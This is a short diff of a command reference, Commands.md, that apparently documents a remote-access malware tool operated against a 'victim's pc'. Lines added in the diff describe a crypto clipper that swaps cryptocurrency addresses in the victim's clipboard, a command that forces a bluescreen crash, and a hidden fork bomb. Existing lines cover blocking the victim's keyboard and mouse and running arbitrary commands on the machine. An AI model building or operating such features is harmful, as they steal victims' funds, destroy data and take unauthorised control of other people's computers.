Nighttimesloth/mynameisgeorge/Commands.md

 block / unblock keyboard and mouse inputs
 (works in all cases except ctrl + alt + del)

+## .start-clipper / .stop-clipper

+starts / stops the crypto clipper thread
+(replaces crypto currency addresess from the victim's clipboard)

+## .bsod
+triggers a bluescreen of death
+(crashes the system by causes a critical failure | can lead to data loss)

+## .forkbomb
+creates a small hidden process that replicates itself until all system resources have been depleted (leads to a momentary freeze and then a crash | less dangerous than `.bsod`)

 ## .cmd [command]

 execute a command on the victim's pc